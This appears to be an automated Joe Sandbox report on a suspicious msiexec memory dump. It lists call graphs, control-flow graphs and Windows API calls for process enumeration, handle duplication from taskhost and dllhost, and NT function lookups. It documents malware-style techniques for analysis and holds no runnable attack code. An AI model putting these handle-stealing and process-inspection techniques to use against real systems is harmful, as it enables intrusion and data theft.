39550->39639 39556 40dd50 _wcsicmp 39555->39556 39557 40e283 39555->39557 39563 40e244 _snwprintf 39555->39563 39646 406e8f 13 API calls 39555->39646 39647 40742e 8 API calls 39555->39647 39648 40aae3 wcslen wcslen _memicmp 39555->39648 39650 406b53 SetFilePointerEx ReadFile 39555->39650 39556->39555 39558 40e291 39557->39558 39559 40e288 free 39557->39559 39560 40aa04 free 39558->39560 39559->39558 39560->39550 39649 40a8d0 7 API calls 39563->39649 39566 40e2c2 39565->39566 39567 406b90 11 API calls 39566->39567 39573 40e2d3 39567->39573 39568 40e4a0 39569 4069a3 2 API calls 39568->39569 39571 40e4ab 39569->39571 39571->39521 39573->39568 39574 40e489 39573->39574 39575 40dd50 _wcsicmp 39573->39575 39583 40e3e0 memcpy 39573->39583 39584 40e3fb memcpy 39573->39584 39585 40e3b3 wcschr 39573->39585 39586 40e416 memcpy 39573->39586 39587 40e431 memcpy 39573->39587 39651 406e8f 13 API calls 39573->39651 39652 40dd50 _wcsicmp 39573->39652 39654 40742e 8 API calls 39573->39654 39655 406b53 SetFilePointerEx ReadFile 39573->39655 39576 40aa04 free 39574->39576 39575->39573 39577 40e491 39576->39577 39577->39568 39578 40e497 free 39577->39578 39578->39568 39580 40e376 memset 39653 40aa29 6 API calls 39580->39653 39583->39573 39584->39573 39585->39573 39586->39573 39587->39573 39588->39503 39590 406294 CloseHandle 39589->39590 39591 406224 39590->39591 39592 4096c3 CreateFileW 39591->39592 39594 40622d 39592->39594 39593 406281 GetLastError 39595 40625a 39593->39595 39594->39593 39596 40a2ef ReadFile 39594->39596 39595->39525 39600 40dd85 memset 39595->39600 39597 406244 39596->39597 39597->39593 39598 40624b 39597->39598 39598->39595 39599 406777 19 API calls 39598->39599 39599->39595 39601 409bca GetModuleFileNameW 39600->39601 39602 40ddbe CreateFileW 39601->39602 39605 40ddf1 39602->39605 39603 40afcf ??2@YAPAXI ??3@YAXPAX 39603->39605 39604 41352f 9 API calls 39604->39605 39605->39603 39605->39604 39606 40de0b NtQuerySystemInformation 39605->39606 39607 40de3b 
CloseHandle GetCurrentProcessId 39605->39607 39606->39605 39608 40de54 39607->39608 39609 413d4c 46 API calls 39608->39609 39618 40de88 39609->39618 39610 40e00c 39611 413d29 free FreeLibrary 39610->39611 39612 40e014 39611->39612 39612->39525 39612->39528 39613 40dea9 _wcsicmp 39614 40dee7 OpenProcess 39613->39614 39615 40debd _wcsicmp 39613->39615 39614->39618 39615->39614 39616 40ded0 _wcsicmp 39615->39616 39616->39614 39616->39618 39617 40dfef CloseHandle 39617->39618 39618->39610 39618->39613 39618->39617 39619 40df23 GetCurrentProcess DuplicateHandle 39618->39619 39622 40df8f CloseHandle 39618->39622 39623 40df78 39618->39623 39619->39618 39620 40df4c memset 39619->39620 39621 41352f 9 API calls 39620->39621 39621->39618 39622->39623 39623->39617 39623->39622 39624 40dfae _wcsicmp 39623->39624 39624->39618 39624->39623 39626 409a74 GetTempFileNameW 39625->39626 39627 409a66 GetWindowsDirectoryW 39625->39627 39626->39538 39627->39626 39628->39540 39632 406bd5 39629->39632 39633 406bad 39629->39633 39630 406bba _wcsicmp 39630->39632 39630->39633 39631 4066bf free malloc memcpy free free 39634 406be5 39631->39634 39632->39631 39638 406c0f 39632->39638 39633->39630 39633->39632 39635 40afcf ??2@YAPAXI ??3@YAXPAX 39634->39635 39634->39638 39636 406bff 39635->39636 39637 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39636->39637 39637->39638 39638->39549 39638->39550 39640 4069c4 ??3@YAXPAX 39639->39640 39641 4069af 39640->39641 39642 40b633 free 39641->39642 39643 4069ba 39642->39643 39644 40b04b ??3@YAXPAX 39643->39644 39645 4069c2 39644->39645 39645->39521 39646->39555 39647->39555 39648->39555 39649->39555 39650->39555 39651->39573 39652->39580 39653->39573 39654->39573 39655->39573 39658 40a980 39656->39658 39657 40a8bb 39657->39444 39661 40a8d0 7 API calls 39657->39661 39658->39657 39659 40a995 _wcsicmp 39658->39659 39660 40a99c wcscmp 39658->39660 39659->39658 39660->39658 39661->39444 39662->39448 39664 40aa23 RegEnumValueW 39663->39664 
39664->39457 39664->39458 39665->39461 39666->39463 39668 405335 39667->39668 39669 40522a 39667->39669 39668->39040 39670 40b2cc 27 API calls 39669->39670 39671 405234 39670->39671 39672 40a804 8 API calls 39671->39672 39673 40523a 39672->39673 39712 40b273 39673->39712 39675 405248 _mbscpy _mbscat GetProcAddress 39676 40b273 27 API calls 39675->39676 39677 405279 39676->39677 39715 405211 GetProcAddress 39677->39715 39679 405282 39680 40b273 27 API calls 39679->39680 39681 40528f 39680->39681 39716 405211 GetProcAddress 39681->39716 39683 405298 39684 40b273 27 API calls 39683->39684 39685 4052a5 39684->39685 39717 405211 GetProcAddress 39685->39717 39687 4052ae 39688 40b273 27 API calls 39687->39688 39689 4052bb 39688->39689 39718 405211 GetProcAddress 39689->39718 39691 4052c4 39692 40b273 27 API calls 39691->39692 39693 4052d1 39692->39693 39719 405211 GetProcAddress 39693->39719 39695 4052da 39696 40b273 27 API calls 39695->39696 39697 4052e7 39696->39697 39720 405211 GetProcAddress 39697->39720 39699 4052f0 39700 40b273 27 API calls 39699->39700 39701 4052fd 39700->39701 39721 405211 GetProcAddress 39701->39721 39703 405306 39704 40b273 27 API calls 39703->39704 39705 405313 39704->39705 39722 405211 GetProcAddress 39705->39722 39707 40531c 39708 40b273 27 API calls 39707->39708 39709 405329 39708->39709 39723 405211 GetProcAddress 39709->39723 39711 405332 39711->39668 39713 40b58d 27 API calls 39712->39713 39714 40b18c 39713->39714 39714->39675 39715->39679 39716->39683 39717->39687 39718->39691 39719->39695 39720->39699 39721->39703 39722->39707 39723->39711 39725 40440c FreeLibrary 39724->39725 39726 40436d 39725->39726 39727 40a804 8 API calls 39726->39727 39728 404377 39727->39728 39729 404383 39728->39729 39730 404405 39728->39730 39731 40b273 27 API calls 39729->39731 39730->39052 39730->39054 39730->39055 39732 40438d GetProcAddress 39731->39732 39733 40b273 27 API calls 39732->39733 39734 4043a7 GetProcAddress 39733->39734 39735 40b273 27 API calls 
39734->39735 39736 4043ba GetProcAddress 39735->39736 39737 40b273 27 API calls 39736->39737 39738 4043ce GetProcAddress 39737->39738 39739 40b273 27 API calls 39738->39739 39740 4043e2 GetProcAddress 39739->39740 39741 4043f1 39740->39741 39742 4043f7 39741->39742 39743 40440c FreeLibrary 39741->39743 39742->39730 39743->39730 39745 404413 FreeLibrary 39744->39745 39746 40441e 39744->39746 39745->39746 39746->39069 39747->39059 39749 40442e 39748->39749 39753 40447e 39748->39753 39750 40b2cc 27 API calls 39749->39750 39751 404438 39750->39751 39752 40a804 8 API calls 39751->39752 39754 40443e 39752->39754 39753->39059 39755 404445 39754->39755 39756 404467 39754->39756 39757 40b273 27 API calls 39755->39757 39756->39753 39759 404475 FreeLibrary 39756->39759 39758 40444f GetProcAddress 39757->39758 39758->39756 39760 404460 39758->39760 39759->39753 39760->39756 39762 4135f6 39761->39762 39763 4135eb FreeLibrary 39761->39763 39762->39072 39763->39762 39765 4449c4 39764->39765 39766 444a52 39764->39766 39767 40b2cc 27 API calls 39765->39767 39766->39089 39766->39090 39768 4449cb 39767->39768 39769 40a804 8 API calls 39768->39769 39770 4449d1 39769->39770 39771 40b273 27 API calls 39770->39771 39772 4449dc GetProcAddress 39771->39772 39773 40b273 27 API calls 39772->39773 39774 4449f3 GetProcAddress 39773->39774 39775 40b273 27 API calls 39774->39775 39776 444a04 GetProcAddress 39775->39776 39777 40b273 27 API calls 39776->39777 39778 444a15 GetProcAddress 39777->39778 39779 40b273 27 API calls 39778->39779 39780 444a26 GetProcAddress 39779->39780 39781 40b273 27 API calls 39780->39781 39782 444a37 GetProcAddress 39781->39782 39783 40b273 27 API calls 39782->39783 39784 444a48 GetProcAddress 39783->39784 39784->39766 39785->39100 39786->39100 39787->39100 39788->39100 39789->39091 39791 403a29 39790->39791 39805 403bed memset memset 39791->39805 39793 403ae7 39818 40b1ab free free 39793->39818 39794 403a3f memset 39799 403a2f 39794->39799 39796 403aef 39796->39107 
39797 409d1f 6 API calls 39797->39799 39798 409b98 GetFileAttributesW 39798->39799 39799->39793 39799->39794 39799->39797 39799->39798 39800 40a8d0 7 API calls 39799->39800 39800->39799 39802 40a051 GetFileTime CloseHandle 39801->39802 39803 4039ca CompareFileTime 39801->39803 39802->39803 39803->39107 39804->39108 39806 414c2e 15 API calls 39805->39806 39807 403c38 39806->39807 39808 409719 2 API calls 39807->39808 39809 403c3f wcscat 39808->39809 39810 414c2e 15 API calls 39809->39810 39811 403c61 39810->39811 39812 409719 2 API calls 39811->39812 39813 403c68 wcscat 39812->39813 39819 403af5 39813->39819 39816 403af5 20 API calls 39817 403c95 39816->39817 39817->39799 39818->39796 39820 403b02 39819->39820 39821 40ae18 9 API calls 39820->39821 39829 403b37 39821->39829 39822 403bdb 39823 40aebe FindClose 39822->39823 39824 403be6 39823->39824 39824->39816 39825 40ae18 9 API calls 39825->39829 39826 40ae51 9 API calls 39826->39829 39827 40aebe FindClose 39827->39829 39828 40add4 wcscmp wcscmp 39828->39829 39829->39822 39829->39825 39829->39826 39829->39827 39829->39828 39830 40a8d0 7 API calls 39829->39830 39830->39829 39832 409d1f 6 API calls 39831->39832 39833 404190 39832->39833 39846 409b98 GetFileAttributesW 39833->39846 39835 40419c 39836 4041a7 6 API calls 39835->39836 39837 40435c 39835->39837 39838 40424f 39836->39838 39837->39134 39838->39837 39840 40425e memset 39838->39840 39842 409d1f 6 API calls 39838->39842 39843 40a8ab 9 API calls 39838->39843 39847 414842 39838->39847 39840->39838 39841 404296 wcscpy 39840->39841 39841->39838 39842->39838 39844 4042b6 memset memset _snwprintf wcscpy 39843->39844 39844->39838 39845->39132 39846->39835 39850 41443e 39847->39850 39849 414866 39849->39838 39851 41444b 39850->39851 39852 414451 39851->39852 39853 4144a3 GetPrivateProfileStringW 39851->39853 39854 414491 39852->39854 39855 414455 wcschr 39852->39855 39853->39849 39857 414495 WritePrivateProfileStringW 39854->39857 39855->39854 39856 414463 _snwprintf 
39855->39856 39856->39857 39857->39849 39858->39138 39860 40b2cc 27 API calls 39859->39860 39861 409615 39860->39861 39862 409d1f 6 API calls 39861->39862 39863 409625 39862->39863 39888 409b98 GetFileAttributesW 39863->39888 39865 409634 39866 409648 39865->39866 39889 4091b8 memset 39865->39889 39868 40b2cc 27 API calls 39866->39868 39875 408801 39866->39875 39869 40965d 39868->39869 39870 409d1f 6 API calls 39869->39870 39871 40966d 39870->39871 39941 409b98 GetFileAttributesW 39871->39941 39873 40967c 39874 409681 39873->39874 39873->39875 39942 409529 72 API calls 39874->39942 39875->39141 39875->39169 39877 409690 39877->39875 39878->39163 39879->39169 39888->39865 39943 40a6e6 WideCharToMultiByte 39889->39943 39891 409202 39944 444432 39891->39944 39894 40b273 27 API calls 39895 409236 39894->39895 39990 438552 39895->39990 39898 409383 39900 40b273 27 API calls 39898->39900 39899 4251c4 136 API calls 39903 409254 39899->39903 39901 409399 39900->39901 39904 438552 133 API calls 39901->39904 39902 40937b 39997 424f26 122 API calls 39902->39997 39903->39902 39993 4253cf 17 API calls 39903->39993 39923 4093a3 39904->39923 39907 4094ff 40001 443d90 39907->40001 39908 409267 39994 4253cf 17 API calls 39908->39994 39911 4251c4 136 API calls 39911->39923 39912 409273 39995 4253af 17 API calls 39912->39995 39913 409507 39920 40951d 39913->39920 40021 408f2f 77 API calls 39913->40021 39915 4093df 40000 424f26 122 API calls 39915->40000 39916 40927f 39996 4253af 17 API calls 39916->39996 39917 4253cf 17 API calls 39917->39923 39920->39866 39922 40928b 39922->39902 39924 4092be memcpy memcmp 39922->39924 39923->39907 39923->39911 39923->39915 39923->39917 39925 4093e4 39923->39925 39926 409333 memcmp 39924->39926 39927 4092e5 39924->39927 39998 4253af 17 API calls 39925->39998 39926->39902 39930 409347 memcpy 39926->39930 39927->39902 39929 4092f2 memcpy memcpy 39927->39929 39932 409363 memcpy 39929->39932 39930->39932 39931 4093ed 39999 4253af 17 API calls 
39931->39999 39932->39902 39934 4093f9 39934->39915 39935 409409 memcmp 39934->39935 39935->39915 39936 409421 memcmp 39935->39936 39937 4094a4 memcmp 39936->39937 39938 409435 39936->39938 39937->39915 39940 4094b8 memcpy memcpy 39937->39940 39938->39915 39939 409442 memcpy memcpy memcpy 39938->39939 39939->39915 39940->39915 39941->39873 39942->39877 39943->39891 40022 4438b5 39944->40022 39946 44444c 39947 409215 39946->39947 40036 415a6d 39946->40036 39947->39894 39947->39920 39950 44469e 39950->39947 39953 443d90 110 API calls 39950->39953 39951 444486 39952 4444b9 memcpy 39951->39952 39989 4444a4 39951->39989 40040 415258 39952->40040 39953->39947 39955 444524 39956 444541 39955->39956 39957 44452a 39955->39957 40043 444316 39956->40043 39958 416935 16 API calls 39957->39958 39958->39989 39961 444316 18 API calls 39962 444563 39961->39962 39963 444316 18 API calls 39962->39963 39964 44456f 39963->39964 39965 444316 18 API calls 39964->39965 40078 4442e6 11 API calls 39989->40078 39991 438460 133 API calls 39990->39991 39992 409240 39991->39992 39992->39898 39992->39899 39993->39908 39994->39912 39995->39916 39996->39922 39997->39898 39998->39931 39999->39934 40000->39907 40002 443da3 40001->40002 40011 443db6 40001->40011 40097 41707a 11 API calls 40002->40097 40004 443da8 40005 443dbc 40004->40005 40006 443dac 40004->40006 40099 4300e8 memset memset memcpy 40005->40099 40098 4446ea 11 API calls 40006->40098 40009 443de0 40011->39913 40012 443dce 40012->40009 40016 443e22 40012->40016 40013 443e5a 40016->40013 40100 41f0ac 102 API calls 40016->40100 40021->39920 40023 4438d0 40022->40023 40033 4438c9 40022->40033 40079 415378 memcpy memcpy 40023->40079 40033->39946 40037 415a77 40036->40037 40038 415a8d 40037->40038 40039 415a7e memset 40037->40039 40038->39951 40039->40038 40041 4438b5 11 API calls 40040->40041 40042 41525d 40041->40042 40042->39955 40044 444328 40043->40044 40045 444423 40044->40045 40046 44434e 40044->40046 40080 4446ea 11 API calls 
40045->40080 40048 432d4e 3 API calls 40046->40048 40049 44435a 40048->40049 40051 444375 40049->40051 40056 44438b 40049->40056 40050 432d4e 3 API calls 40052 4443ec 40050->40052 40053 416935 16 API calls 40051->40053 40054 444381 40052->40054 40055 416935 16 API calls 40052->40055 40053->40054 40054->39961 40055->40054 40056->40050 40078->39950 40080->40054 40097->40004 40098->40011 40099->40012 40100->40016 40131 413f4f 40103->40131 40106 413f37 K32GetModuleFileNameExW 40107 413f4a 40106->40107 40107->39201 40109 413969 wcscpy 40108->40109 40110 41396c wcschr 40108->40110 40121 413a3a 40109->40121 40110->40109 40112 41398e 40110->40112 40136 4097f7 wcslen wcslen _memicmp 40112->40136 40114 41399a 40115 4139a4 memset 40114->40115 40116 4139e6 40114->40116 40137 409dd5 GetWindowsDirectoryW wcscpy 40115->40137 40117 413a31 wcscpy 40116->40117 40118 4139ec memset 40116->40118 40117->40121 40138 409dd5 GetWindowsDirectoryW wcscpy 40118->40138 40121->39201 40122 4139c9 wcscpy wcscat 40122->40121 40123 413a11 memcpy wcscat 40123->40121 40125 413cb0 GetModuleHandleW 40124->40125 40126 413cda 40124->40126 40125->40126 40127 413cbf GetProcAddress 40125->40127 40128 413ce3 GetProcessTimes 40126->40128 40129 413cf6 40126->40129 40127->40126 40128->39204 40129->39204 40130->39195 40132 413f2f 40131->40132 40133 413f54 40131->40133 40132->40106 40132->40107 40134 40a804 8 API calls 40133->40134 40135 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40134->40135 40135->40132 40136->40114 40137->40122 40138->40123 40139->39225 40140->39248 40142 409cf9 GetVersionExW 40141->40142 40143 409d0a 40141->40143 40142->40143 40143->39254 40143->39258 40144->39262 40145->39264 40146->39330 40148 40bba5 40147->40148 40192 40cc26 40148->40192 40151 40bd4b 40213 40cc0c 40151->40213 40156 40b2cc 27 API calls 40157 40bbef 40156->40157 40220 40ccf0 _wcsicmp 40157->40220 40159 40bbf5 40159->40151 40221 40ccb4 6 API calls 40159->40221 40161 40bc26 40162 40cf04 
17 API calls 40161->40162 40163 40bc2e 40162->40163 40164 40bd43 40163->40164 40165 40b2cc 27 API calls 40163->40165 40166 40cc0c 4 API calls 40164->40166 40167 40bc40 40165->40167 40166->40151 40222 40ccf0 _wcsicmp 40167->40222 40169 40bc46 40169->40164 40170 40bc61 memset memset WideCharToMultiByte 40169->40170 40223 40103c strlen 40170->40223 40172 40bcc0 40173 40b273 27 API calls 40172->40173 40174 40bcd0 memcmp 40173->40174 40174->40164 40175 40bce2 40174->40175 40176 404423 37 API calls 40175->40176 40177 40bd10 40176->40177 40177->40164 40178 40bd3a LocalFree 40177->40178 40179 40bd1f memcpy 40177->40179 40178->40164 40179->40178 40180->39343 40181->39379 40182->39379 40183->39379 40184->39379 40185->39379 40186->39379 40187->39379 40188->39379 40189->39379 40190->39355 40191->39376 40224 4096c3 CreateFileW 40192->40224 40194 40cc34 40195 40cc3d GetFileSize 40194->40195 40197 40bbca 40194->40197 40196 40afcf 2 API calls 40195->40196 40198 40cc64 40196->40198 40197->40151 40204 40cf04 40197->40204 40225 40a2ef ReadFile 40198->40225 40200 40cc71 40226 40ab4a MultiByteToWideChar 40200->40226 40202 40cc95 CloseHandle 40203 40b04b ??3@YAXPAX 40202->40203 40203->40197 40205 40b633 free 40204->40205 40206 40cf14 40205->40206 40232 40b1ab free free 40206->40232 40208 40cf1b 40209 40bbdd 40208->40209 40211 40cfef 40208->40211 40233 40cd4b 40208->40233 40209->40151 40209->40156 40212 40cd4b 14 API calls 40211->40212 40212->40209 40214 40b633 free 40213->40214 40215 40cc15 40214->40215 40216 40aa04 free 40215->40216 40217 40cc1d 40216->40217 40279 40b1ab free free 40217->40279 40219 40b7d4 memset CreateFileW 40219->39336 40219->39337 40220->40159 40221->40161 40222->40169 40223->40172 40224->40194 40225->40200 40227 40ab6b 40226->40227 40231 40ab93 40226->40231 40228 40a9ce 4 API calls 40227->40228 40229 40ab74 40228->40229 40230 40ab7c MultiByteToWideChar 40229->40230 40230->40231 40231->40202 40232->40208 40234 40cd7b 40233->40234 40267 40aa29 6 API calls 
40234->40267 40236 40cef5 40237 40aa04 free 40236->40237 40238 40cefd 40237->40238 40238->40208 40239 40cd89 40239->40236 40268 40aa29 6 API calls 40239->40268 40241 40ce1d 40269 40aa29 6 API calls 40241->40269 40243 40ce3e 40246 40ce6a 40243->40246 40270 40abb7 wcslen memmove 40243->40270 40244 40ce9f 40276 40a8d0 7 API calls 40244->40276 40246->40244 40273 40abb7 wcslen memmove 40246->40273 40248 40ce56 40271 40aa71 wcslen 40248->40271 40250 40ceb5 40277 40a8d0 7 API calls 40250->40277 40252 40ce8b 40274 40aa71 wcslen 40252->40274 40253 40ce5e 40272 40abb7 wcslen memmove 40253->40272 40257 40ce93 40275 40abb7 wcslen memmove 40257->40275 40258 40cecb 40278 40d00b malloc memcpy free free 40258->40278 40261 40cedd 40262 40aa04 free 40261->40262 40263 40cee5 40262->40263 40264 40aa04 free 40263->40264 40265 40ceed 40264->40265 40266 40aa04 free 40265->40266 40266->40236 40267->40239 40268->40241 40269->40243 40270->40248 40271->40253 40272->40246 40273->40252 40274->40257 40275->40244 40276->40250 40277->40258 40278->40261 40279->40219 40280->39395 40281->39403 40282 441819 40285 430737 40282->40285 40284 441825 40286 430756 40285->40286 40298 43076d 40285->40298 40287 430774 40286->40287 40288 43075f 40286->40288 40300 43034a memcpy 40287->40300 40299 4169a7 11 API calls 40288->40299 40291 4307ce 40293 430819 memset 40291->40293 40301 415b2c 11 API calls 40291->40301 40292 43077e 40292->40291 40296 4307fa 40292->40296 40292->40298 40293->40298 40295 4307e9 40295->40293 40295->40298 40302 4169a7 11 API calls 40296->40302 40298->40284 40299->40298 40300->40292 40301->40295 40302->40298 40303 41493c EnumResourceNamesW

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 358 40de74-40de78 355->358 359 40de65-40de6c 355->359 358->352 358->355 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                    • String ID: dllhost.exe$p+8w@F8w@B8w$taskhost.exe$taskhostex.exe
                                                                                                    • API String ID: 708747863-2348828428
                                                                                                    • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                    • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                    control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 649 413edb-413ee2 646->649 647->649 657 413ee4 649->657 658 413ee7-413efe 649->658 663 413ea2-413eae CloseHandle 651->663 655 413e61-413e68 652->655 656 413e37-413e44 GetModuleHandleW 652->656 655->651 661 413e6a-413e76 655->661 656->655 660 413e46-413e5c GetProcAddress 656->660 657->658 658->639 660->655 661->651 663->642
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                    • free.MSVCRT ref: 00413EC1
                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                    • API String ID: 1344430650-1740548384
                                                                                                    • Opcode ID: 7c7ced78dc977ac1984e29a997ae28abe0cf01dcec689db1eb0d9dc9294447ec
                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                    • Opcode Fuzzy Hash: 7c7ced78dc977ac1984e29a997ae28abe0cf01dcec689db1eb0d9dc9294447ec
                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                    APIs
                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
